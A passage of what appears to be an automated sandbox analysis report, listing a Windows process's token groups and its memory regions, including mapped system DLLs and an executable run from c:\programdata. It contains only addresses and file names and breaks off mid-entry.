"XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e620" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2055 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2056 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2057 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2058 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2059 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 2060 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 2061 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2062 start_va = 0x55820000 end_va = 0x5585bfff entry_point = 0x5582d821 region_type = mapped_file name = "bce1010314.exe" filename = "\\ProgramData\\BCE1010314.exe" (normalized: "c:\\programdata\\bce1010314.exe") Region: id = 2063 start_va = 0x76cc0000 end_va = 0x76e68fff entry_point = 0x76cc0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2064 start_va = 0x76ea0000 end_va = 0x7701ffff entry_point = 0x76ea0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2065 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2066 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2067 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2068 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2069 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2070 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2071 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2072 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2073 start_va = 0x73410000 end_va = 0x73417fff entry_point = 0x73410000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2074 start_va = 0x73420000 end_va = 0x7347bfff entry_point = 0x73420000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2075 start_va = 0x73480000 end_va = 0x734befff entry_point = 0x73480000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2076 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 2077 start_va = 0x74c40000 end_va = 0x74c85fff entry_point = 0x74c40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2078 start_va = 0x75ce0000 end_va = 0x75deffff entry_point = 0x75ce0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2079 start_va = 0x76aa0000 end_va = 0x76bbefff entry_point = 0x0 region_type = private name = "private_0x0000000076aa0000" filename = "" Region: id = 2080 start_va = 0x76bc0000 end_va = 0x76cb9fff entry_point = 0x0 region_type = private name = "private_0x0000000076bc0000" filename = "" Region: id = 2153 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2154 start_va = 0x370000 end_va = 0x3d6fff entry_point = 0x370000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2155 start_va = 0x410000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 2156 start_va = 0x729a0000 end_va = 0x729a7fff entry_point = 0x729a10e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 2157 start_va = 0x729b0000 end_va = 0x729ebfff entry_point = 0x729b1396 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\SysWOW64\\pdh.dll" (normalized: "c:\\windows\\syswow64\\pdh.dll") Region: id = 2158 start_va = 0x729f0000 end_va = 0x72a73fff entry_point = 0x729f19a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 2159 start_va = 0x749f0000 end_va = 0x749fbfff entry_point = 0x749f10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2160 start_va = 0x74a00000 end_va = 0x74a5ffff entry_point = 0x74a1a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2161 start_va = 0x74a60000 end_va = 0x74abffff entry_point = 0x74a7158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2162 start_va = 0x74ad0000 end_va = 0x74b5efff entry_point = 0x74ad3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2163 start_va = 0x74b90000 end_va = 0x74c0afff entry_point = 0x74b91aee region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 2164 start_va = 0x74c10000 end_va = 0x74c36fff entry_point = 0x74c158b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 2165 start_va = 0x74c90000 end_va = 0x74ca1fff entry_point = 0x74c91441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 2166 start_va = 0x74cb0000 end_va = 0x758f9fff entry_point = 0x74d31601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2167 start_va = 0x75960000 end_va = 0x759fffff entry_point = 0x759749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2168 start_va = 0x75c50000 end_va = 0x75cdffff entry_point = 0x75c66343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2169 start_va = 0x75df0000 end_va = 0x75e46fff entry_point = 0x75e09ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2170 start_va = 0x75e50000 end_va = 0x75eecfff entry_point = 0x75e83fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2171 start_va = 0x76280000 end_va = 0x7632bfff entry_point = 0x7628a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2172 start_va = 0x76330000 end_va = 0x76348fff entry_point = 0x76334975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2173 start_va = 0x76350000 end_va = 0x764abfff entry_point = 0x7639ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2174 start_va = 0x764b0000 end_va = 0x765affff entry_point = 0x764cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2175 start_va = 0x766f0000 end_va = 0x767bbfff entry_point = 0x766f168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2176 start_va = 0x767c0000 end_va = 0x767c9fff entry_point = 0x767c36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2177 start_va = 0x767d0000 end_va = 0x768bffff entry_point = 0x767e0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2178 start_va = 0x768c0000 end_va = 0x76a5cfff entry_point = 0x768c17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 2179 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2180 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2197 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2198 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2199 start_va = 0x1b0000 end_va = 0x1b6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2200 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 2201 start_va = 0x420000 end_va = 0x5a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 2202 start_va = 0x5b0000 end_va = 0x730fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2203 start_va = 0x740000 end_va = 0x1b3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 2204 start_va = 0x1b40000 end_va = 0x1bbffff entry_point = 0x0 region_type = private name = "private_0x0000000001b40000" filename = "" Region: id = 2205 start_va = 0x1c20000 end_va = 0x1c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c20000" filename = "" Region: id = 2206 start_va = 0x1cc0000 end_va = 0x1ccffff entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 2207 start_va = 0x1e20000 end_va = 0x1e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 2208 start_va = 0x1e60000 end_va = 0x2252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e60000" filename = "" Region: id = 2209 start_va = 0x731b0000 end_va = 0x731c5fff entry_point = 0x731b2dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2210 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 2211 start_va = 0x731a0000 end_va = 0x731a7fff entry_point = 0x731a34d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 2212 start_va = 0x731f0000 end_va = 0x7326ffff entry_point = 0x731f0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2213 start_va = 0x2260000 end_va = 0x23dffff entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 2235 start_va = 0x1cd0000 end_va = 0x1daefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cd0000" filename = "" Region: id = 2238 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 2239 start_va = 0x22d0000 end_va = 0x2397fff entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 2240 start_va = 0x23a0000 end_va = 0x23dffff entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 2242 start_va = 0x23e0000 end_va = 0x26aefff entry_point = 0x23e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2246 start_va = 0x260000 end_va = 0x261fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 2247 start_va = 0x73270000 end_va = 0x7340dfff entry_point = 0x7329e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 2248 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x3e0000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2250 start_va = 0x3f0000 end_va = 0x3f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 2265 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 2266 start_va = 0x75a90000 end_va = 0x75b12fff entry_point = 0x75a923d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2267 start_va = 0x400000 end_va = 0x400fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2287 start_va = 0x1bc0000 end_va = 0x1bfffff entry_point = 0x0 region_type = private name = "private_0x0000000001bc0000" filename = "" Region: id = 2288 start_va = 0x26b0000 end_va = 0x27affff entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 2289 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 2290 start_va = 0x1c30000 end_va = 0x1c6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c30000" filename = "" Region: id = 2291 start_va = 0x27b0000 end_va = 0x28affff entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 2292 start_va = 0x749c0000 end_va = 0x749d5fff entry_point = 0x749c2dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2293 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 2294 start_va = 0x1c70000 end_va = 0x1cabfff entry_point = 0x1c7128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2295 start_va = 0x1c70000 end_va = 0x1cabfff entry_point = 0x1c7128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2296 start_va = 0x1c70000 end_va = 0x1cabfff entry_point = 0x1c7128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2297 start_va = 0x1c70000 end_va = 0x1cabfff entry_point = 0x1c7128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2298 start_va = 0x1c70000 end_va = 0x1cabfff entry_point = 0x1c7128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2299 start_va = 0x74980000 end_va = 0x749bafff entry_point = 0x7498128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2311 start_va = 0x74970000 end_va = 0x7497dfff entry_point = 0x74971235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 2319 start_va = 0x1c70000 end_va = 0x1caffff entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 2320 start_va = 0x1db0000 end_va = 0x1deffff entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 2321 start_va = 0x28b0000 end_va = 0x29affff entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 2322 start_va = 0x29b0000 end_va = 0x2aaffff entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 2323 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 2324 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 2331 start_va = 0x2ab0000 end_va = 0x2b6ffff entry_point = 0x2ab0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2350 start_va = 0x1c00000 end_va = 0x1c00fff entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 2351 start_va = 0x2260000 end_va = 0x229ffff entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 2352 start_va = 0x2b70000 end_va = 0x2c6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b70000" filename = "" Region: id = 2353 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 2354 start_va = 0x1c10000 end_va = 0x1c10fff entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 2355 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 2356 start_va = 0x1df0000 end_va = 0x1df0fff entry_point = 0x0 region_type = private name = "private_0x0000000001df0000" filename = "" Region: id = 2357 start_va = 0x1e00000 end_va = 0x1e00fff entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 2609 start_va = 0x1e10000 end_va = 0x1e10fff entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 2610 start_va = 0x22a0000 end_va = 0x22a0fff entry_point = 0x0 region_type = private name = "private_0x00000000022a0000" filename = "" Region: id = 2611 start_va = 0x22b0000 end_va = 0x22b0fff entry_point = 0x0 region_type = private name = "private_0x00000000022b0000" filename = "" Region: id = 2612 start_va = 0x22c0000 end_va = 0x22c0fff entry_point = 0x0 region_type = private name = "private_0x00000000022c0000" filename = "" Region: id = 2613 start_va = 0x2c70000 end_va = 0x2d6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c70000" filename = "" Region: id = 2614 start_va = 0x2d70000 end_va = 0x2daffff entry_point = 0x0 region_type = private name = "private_0x0000000002d70000" filename = "" Region: id = 2615 start_va = 0x2db0000 end_va = 0x2eaffff entry_point = 0x0 region_type = private name = "private_0x0000000002db0000" filename = "" Region: id = 2616 start_va = 0x2eb0000 end_va = 0x2eeffff entry_point = 0x0 region_type = private name = "private_0x0000000002eb0000" filename = "" Region: id = 2617 start_va = 0x2ef0000 end_va = 0x2feffff entry_point = 0x0 region_type = private name = "private_0x0000000002ef0000" filename = "" Region: id = 2618 start_va = 0x2ff0000 end_va = 0x302ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ff0000" filename = "" Region: id = 2619 start_va = 0x3030000 end_va = 0x312ffff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2620 start_va = 0x3130000 end_va = 0x316ffff entry_point = 0x0 region_type = private name = "private_0x0000000003130000" filename = "" Region: id = 2621 start_va = 0x3170000 end_va = 0x326ffff entry_point = 0x0 region_type = private name = "private_0x0000000003170000" filename = "" Region: id = 2622 start_va = 0x3270000 end_va = 0x32affff entry_point = 0x0 region_type = private name = "private_0x0000000003270000" filename = "" Region: id = 2623 start_va = 0x32b0000 end_va = 0x33affff entry_point = 0x0 region_type = private name = "private_0x00000000032b0000" filename = "" Region: id = 2624 start_va = 0x33b0000 end_va = 0x33effff entry_point = 0x0 region_type = private name = "private_0x00000000033b0000" filename = "" Region: id = 2625 start_va = 0x33f0000 end_va = 0x34effff entry_point = 0x0 region_type = private name = "private_0x00000000033f0000" filename = "" Region: id = 2626 start_va = 0x34f0000 end_va = 0x352ffff entry_point = 0x0 region_type = private name = "private_0x00000000034f0000" filename = "" Region: id = 2627 start_va = 0x3530000 end_va = 0x362ffff entry_point = 0x0 region_type = private name = "private_0x0000000003530000" filename = "" Region: id = 2628 start_va = 0x3630000 end_va = 0x366ffff entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 2629 start_va = 0x3670000 end_va = 0x376ffff entry_point = 0x0 region_type = private name = "private_0x0000000003670000" filename = "" Region: id = 2630 start_va = 0x3770000 end_va = 0x3770fff entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 2631 start_va = 0x3780000 end_va = 0x37bffff entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 2632 start_va = 0x37c0000 end_va = 0x38bffff entry_point = 0x0 region_type = private name = "private_0x00000000037c0000" filename = "" Region: id = 2633 start_va = 0x38c0000 end_va = 0x38c0fff entry_point = 0x0 region_type = private name = "private_0x00000000038c0000" filename = "" Region: id = 2634 start_va = 0x38d0000 end_va = 0x390ffff entry_point = 0x0 region_type = private name = "private_0x00000000038d0000" filename = "" Region: id = 2635 start_va = 0x3910000 end_va = 0x3a0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003910000" filename = "" Region: id = 2636 start_va = 0x3a10000 end_va = 0x3a4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a10000" filename = "" Region: id = 2637 start_va = 0x3a50000 end_va = 0x3b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a50000" filename = "" Region: id = 2638 start_va = 0x3b50000 end_va = 0x3b50fff entry_point = 0x0 region_type = private name = "private_0x0000000003b50000" filename = "" Region: id = 2639 start_va = 0x3b60000 end_va = 0x3b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b60000" filename = "" Region: id = 2640 start_va = 0x3ba0000 end_va = 0x3c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000003ba0000" filename = "" Region: id = 2641 start_va = 0x3ca0000 end_va = 0x3ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ca0000" filename = "" Region: id = 2642 start_va = 0x3cb0000 end_va = 0x3cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000003cb0000" filename = "" Region: id = 2643 start_va = 0x3cc0000 end_va = 0x3cc0fff entry_point = 0x0 region_type = private name = "private_0x0000000003cc0000" filename = "" Region: id = 2644 start_va = 0x3cd0000 end_va = 0x3cd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003cd0000" filename = "" Region: id = 2645 start_va = 0x3ce0000 end_va = 0x3ce0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ce0000" filename = "" Region: id = 2646 start_va = 0x3cf0000 end_va = 0x3cf0fff entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 2647 start_va = 0x3d00000 end_va = 0x3d00fff entry_point = 0x0 region_type = private name = "private_0x0000000003d00000" filename = "" Region: id = 2648 start_va = 0x3d10000 end_va = 0x3d10fff entry_point = 0x0 region_type = private name = "private_0x0000000003d10000" filename = "" Region: id = 2649 start_va = 0x3d20000 end_va = 0x3d20fff entry_point = 0x0 region_type = private name = "private_0x0000000003d20000" filename = "" Region: id = 2650 start_va = 0x3d30000 end_va = 0x3d30fff entry_point = 0x0 region_type = private name = "private_0x0000000003d30000" filename = "" Region: id = 2651 start_va = 0x3d40000 end_va = 0x3d40fff entry_point = 0x0 region_type = private name = "private_0x0000000003d40000" filename = "" Region: id = 2652 start_va = 0x3d50000 end_va = 0x3d50fff entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 2653 start_va = 0x3d60000 end_va = 0x3d60fff entry_point = 0x0 region_type = private name = "private_0x0000000003d60000" filename = "" Region: id = 2654 start_va = 0x3d70000 end_va = 0x3d70fff entry_point = 0x0 region_type = private name = "private_0x0000000003d70000" filename = "" Region: id = 2655 start_va = 0x3d80000 end_va = 0x3d80fff entry_point = 0x0 region_type = private name = "private_0x0000000003d80000" filename = "" Region: id = 2656 start_va = 0x3d90000 end_va = 0x3d90fff entry_point = 0x0 region_type = private name = "private_0x0000000003d90000" filename = "" Region: id = 2657 start_va = 0x3da0000 end_va = 0x3da0fff entry_point = 0x0 region_type = private name = "private_0x0000000003da0000" filename = "" Region: id = 2658 start_va = 0x3db0000 end_va = 0x3db0fff entry_point = 0x0 region_type = private name = "private_0x0000000003db0000" filename = "" Region: id = 2659 start_va = 0x3dc0000 end_va = 0x3dc0fff entry_point = 0x0 region_type = private name = "private_0x0000000003dc0000" filename = "" Region: id = 2660 start_va = 0x3dd0000 end_va = 0x3dd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003dd0000" filename = "" Region: id = 2661 start_va = 0x3de0000 end_va = 0x3de0fff entry_point = 0x0 region_type = private name = "private_0x0000000003de0000" filename = "" Region: id = 2662 start_va = 0x3df0000 end_va = 0x3df0fff entry_point = 0x0 region_type = private name = "private_0x0000000003df0000" filename = "" Region: id = 2663 start_va = 0x3e00000 end_va = 0x3e00fff entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 2664 start_va = 0x3e10000 end_va = 0x3e10fff entry_point = 0x0 region_type = private name = "private_0x0000000003e10000" filename = "" Region: id = 2665 start_va = 0x3e20000 end_va = 0x3e20fff entry_point = 0x0 region_type = private name = "private_0x0000000003e20000" filename = "" Region: id = 2666 start_va = 0x3e30000 end_va = 0x3e30fff entry_point = 0x0 region_type = private name = "private_0x0000000003e30000" filename = "" Region: id = 2667 start_va = 0x3e40000 end_va = 0x3e40fff entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 2668 start_va = 0x3e50000 end_va = 0x3e50fff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 2669 start_va = 0x3e60000 end_va = 0x3e60fff entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 2670 start_va = 0x3e70000 end_va = 0x3e70fff entry_point = 0x0 region_type = private name = "private_0x0000000003e70000" filename = "" Region: id = 2671 start_va = 